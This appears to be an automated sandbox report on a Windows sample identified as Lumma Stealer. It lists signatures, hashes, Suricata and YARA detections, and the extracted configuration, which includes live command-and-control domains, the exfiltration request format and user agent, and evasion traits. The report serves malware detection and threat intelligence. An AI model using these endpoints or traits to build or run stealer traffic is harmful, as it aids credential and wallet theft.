Edit tour

Windows Analysis Report
NewI Upd v1.1.0.exe

Overview

General Information

Sample name:	NewI Upd v1.1.0.exe
Analysis ID:	1581123
MD5:	f186a87680772f195f865cedab080b6d
SHA1:	3eae87351603339cb281f0f89722e5b5238d476d
SHA256:	fc07dfae95323c988627ac7e858d37dd165e34b25d5c2a00705caf8fea594e01
Tags:	exeLummaStealeruser-ventoy
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

LummaC encrypted strings found

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

NewI Upd v1.1.0.exe (PID: 6648 cmdline: "C:\Users\user\Desktop\NewI Upd v1.1.0.exe" MD5: F186A87680772F195F865CEDAB080B6D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["bashfulacid.lat", "manyrestro.lat", "talkynicer.lat", "tentabatte.lat", "slipperyloo.lat", "curverpluch.lat", "wordyfindy.lat", "begguinnerz.biz", "shapestickyr.lat"], "Build id": "HpOoIh--3fe7f419a360"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.3109623142.000000000196B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.3179555778.00000000017B0000.00000004.00000010.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
Process Memory Space: NewI Upd v1.1.0.exe PID: 6648	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: NewI Upd v1.1.0.exe PID: 6648	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: NewI Upd v1.1.0.exe PID: 6648	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.NewI Upd v1.1.0.exe.400000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T03:03:10.424698+0100	2028371	3	Unknown Traffic	192.168.2.4	49883	172.67.190.223	443	TCP
2024-12-27T03:03:12.520456+0100	2028371	3	Unknown Traffic	192.168.2.4	49889	172.67.190.223	443	TCP
2024-12-27T03:03:15.056791+0100	2028371	3	Unknown Traffic	192.168.2.4	49895	172.67.190.223	443	TCP
2024-12-27T03:03:17.385054+0100	2028371	3	Unknown Traffic	192.168.2.4	49902	172.67.190.223	443	TCP
2024-12-27T03:03:19.610771+0100	2028371	3	Unknown Traffic	192.168.2.4	49907	172.67.190.223	443	TCP
2024-12-27T03:03:22.349274+0100	2028371	3	Unknown Traffic	192.168.2.4	49914	172.67.190.223	443	TCP
2024-12-27T03:03:24.433081+0100	2028371	3	Unknown Traffic	192.168.2.4	49920	172.67.190.223	443	TCP
2024-12-27T03:03:27.179953+0100	2028371	3	Unknown Traffic	192.168.2.4	49926	172.67.190.223	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T03:03:11.195565+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49883	172.67.190.223	443	TCP
2024-12-27T03:03:13.311805+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49889	172.67.190.223	443	TCP
2024-12-27T03:03:27.935946+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49926	172.67.190.223	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T03:03:11.195565+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49883	172.67.190.223	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T03:03:13.311805+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49889	172.67.190.223	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T03:03:16.071033+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49895	172.67.190.223	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["bashfulacid.lat", "manyrestro.lat", "talkynicer.lat", "tentabatte.lat", "slipperyloo.lat", "curverpluch.lat", "wordyfindy.lat", "begguinnerz.biz", "shapestickyr.lat"], "Build id": "HpOoIh--3fe7f419a360"}

Multi AV Scanner detection for submitted file

Source: NewI Upd v1.1.0.exe	ReversingLabs: Detection: 42%
Source: NewI Upd v1.1.0.exe	Virustotal: Detection: 34%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 88.8% probability

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmp	String decryptor: bashfulacid.lat
Source: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmp	String decryptor: tentabatte.lat
Source: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmp	String decryptor: curverpluch.lat
Source: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmp	String decryptor: talkynicer.lat
Source: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmp	String decryptor: shapestickyr.lat
Source: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmp	String decryptor: manyrestro.lat
Source: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmp	String decryptor: slipperyloo.lat
Source: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmp	String decryptor: wordyfindy.lat
Source: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmp	String decryptor: begguinnerz.biz
Source: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmp	String decryptor: HpOoIh--3fe7f419a360

Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe

Code function: 0_2_004186C0 CryptUnprotectData,

0_2_004186C0

Source: NewI Upd v1.1.0.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.67.190.223:443 -> 192.168.2.4:49883 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.190.223:443 -> 192.168.2.4:49889 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.190.223:443 -> 192.168.2.4:49895 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.190.223:443 -> 192.168.2.4:49902 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.190.223:443 -> 192.168.2.4:49907 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.190.223:443 -> 192.168.2.4:49914 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.190.223:443 -> 192.168.2.4:49920 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.190.223:443 -> 192.168.2.4:49926 version: TLS 1.2

Source: NewI Upd v1.1.0.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:

Binary string: C:\Admin\Workspace\465053702\Project\Release\Project.pdb source: NewI Upd v1.1.0.exe

Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe

Code function: 0_2_00896350 FindFirstFileExW,std::_Timevec::_Timevec,FindNextFileW,

0_2_00896350

Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Comms	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\CEF	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\PeerDistRepub	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Microsoft	Jump to behavior

Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+esi+6C7F40D5h]	0_2_004388C0
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax]	0_2_00423960
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then lea ecx, dword ptr [ebx+15h]	0_2_00423960
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax]	0_2_00423960
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_0042D199
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_0042D199
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then movzx ecx, byte ptr [edx+eax]	0_2_0040E1A0
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then lea edi, dword ptr [edx+ecx]	0_2_00427220
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+3CC22F9Ah]	0_2_0043F230
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax]	0_2_0043F340
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then movzx eax, byte ptr [edx]	0_2_0040C58F
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then mov ebx, ebp	0_2_00408780
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+eax+660D65C5h]	0_2_0040E7AD
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then mov byte ptr [eax], dl	0_2_0040E7AD
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+eax+660D65C5h]	0_2_0040E7AD
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then mov byte ptr [eax], bl	0_2_0040E7AD
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then mov edi, ecx	0_2_0040E7AD
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then mov dword ptr [esp+0Ch], edx	0_2_00418030
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_004358B0
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then mov edx, ecx	0_2_00409960
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then mov ecx, eax	0_2_00426970
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then mov esi, dword ptr [ebp-30h]	0_2_00426970
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then mov byte ptr [edi], 00000000h	0_2_0042D975
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ebx+00000118h]	0_2_00418915
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then mov ebx, eax	0_2_004059F0
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then mov ebp, eax	0_2_004059F0
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then mov ecx, eax	0_2_004149F0
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then mov ecx, eax	0_2_004149F0
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then mov eax, dword ptr [esp+38h]	0_2_004149F0
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_004149F0
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+000002A8h]	0_2_00419981
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then mov word ptr [esi], cx	0_2_0041D190
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	0_2_0042B190
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then mov edx, ecx	0_2_0040B1A0
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edx]	0_2_0043C270
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then movzx esi, byte ptr [edx]	0_2_00402A10
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then movzx eax, byte ptr [esp+esi+03864F4Fh]	0_2_0041723C
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+ebx+000000B8h]	0_2_004192AB
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then mov ebx, dword ptr [ecx+esi*4-000009BCh]	0_2_00408B60
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then cmp word ptr [eax+esi+02h], 0000h	0_2_00422330
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+1Ch]	0_2_00422330
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then mov dword ptr [esp+76h], 4DD55327h	0_2_004243CC
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+53122F4Ah]	0_2_004243CC
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_0042AB80
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 385488F2h	0_2_00429441
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], E0A81160h	0_2_00416490
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-1D225925h]	0_2_00416490
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_00416490
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then jmp dword ptr [0044568Ch]	0_2_00416490
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then mov ecx, edi	0_2_00407550
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+1Fh]	0_2_0041BD56
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_0041BD56
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-00000098h]	0_2_0042DD7A
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then mov byte ptr [edx], al	0_2_0042DD7A
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then mov ecx, eax	0_2_00427520
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_0042D53A
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_00416DE6
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_00416DE6
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then mov ecx, eax	0_2_00426D90
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax]	0_2_00422DA8
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then lea ecx, dword ptr [ebx+15h]	0_2_00422DA8
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax]	0_2_00422DA8
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 385488F2h	0_2_00429653
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then mov esi, dword ptr [esp+20h]	0_2_0041566C
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+280C302Ah]	0_2_0042A67A
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+280C302Ah]	0_2_0042A67A
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-2330E3DCh]	0_2_00415E7F
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 120360DAh	0_2_00415E7F
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-00000098h]	0_2_0042DE1E
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then mov byte ptr [edx], al	0_2_0042DE1E
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-18h]	0_2_00429ED0
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-00000098h]	0_2_0042DE8A
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then mov byte ptr [edx], al	0_2_0042DE8A
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then mov esi, dword ptr [esp+20h]	0_2_0041566C
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-00000098h]	0_2_0042DEA3
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then mov byte ptr [edx], al	0_2_0042DEA3
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+24h]	0_2_004286B5
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then mov edi, ecx	0_2_00428F42
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then mov byte ptr [ebp+00h], al	0_2_0041E750
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then mov ecx, eax	0_2_0041E750
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edx]	0_2_0041E750
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then mov edx, ecx	0_2_0042C70E
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then mov dword ptr [esi], 2120270Ch	0_2_00429723
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 088030A7h	0_2_00419FC0
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 11A82DE9h	0_2_00419FC0
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 11A82DE9h	0_2_00419FC0
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then movzx esi, byte ptr [ecx]	0_2_00419FC0
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then mov edx, eax	0_2_00419FC0
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 6E87DD67h	0_2_00419FC0
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 6E87DD67h	0_2_00419FC0
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 798ECF08h	0_2_00419FC0
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 11A82DE9h	0_2_00419FC0
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h	0_2_00419FC0
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax]	0_2_004237C9
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then lea ecx, dword ptr [ebx+15h]	0_2_004237C9
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax]	0_2_004237C9
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+00000284h]	0_2_0042BFA4
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 9EB5184Bh	0_2_004167AE
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then mov edx, ecx	0_2_004167AE
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], C50B4B65h	0_2_004167AE
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_004167AE
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_004167AE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49889 -> 172.67.190.223:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49889 -> 172.67.190.223:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49895 -> 172.67.190.223:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49926 -> 172.67.190.223:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49883 -> 172.67.190.223:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49883 -> 172.67.190.223:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: bashfulacid.lat
Source: Malware configuration extractor	URLs: manyrestro.lat
Source: Malware configuration extractor	URLs: talkynicer.lat
Source: Malware configuration extractor	URLs: tentabatte.lat
Source: Malware configuration extractor	URLs: slipperyloo.lat
Source: Malware configuration extractor	URLs: curverpluch.lat
Source: Malware configuration extractor	URLs: wordyfindy.lat
Source: Malware configuration extractor	URLs: begguinnerz.biz
Source: Malware configuration extractor	URLs: shapestickyr.lat

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49889 -> 172.67.190.223:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49902 -> 172.67.190.223:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49895 -> 172.67.190.223:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49914 -> 172.67.190.223:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49907 -> 172.67.190.223:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49926 -> 172.67.190.223:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49883 -> 172.67.190.223:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49920 -> 172.67.190.223:443

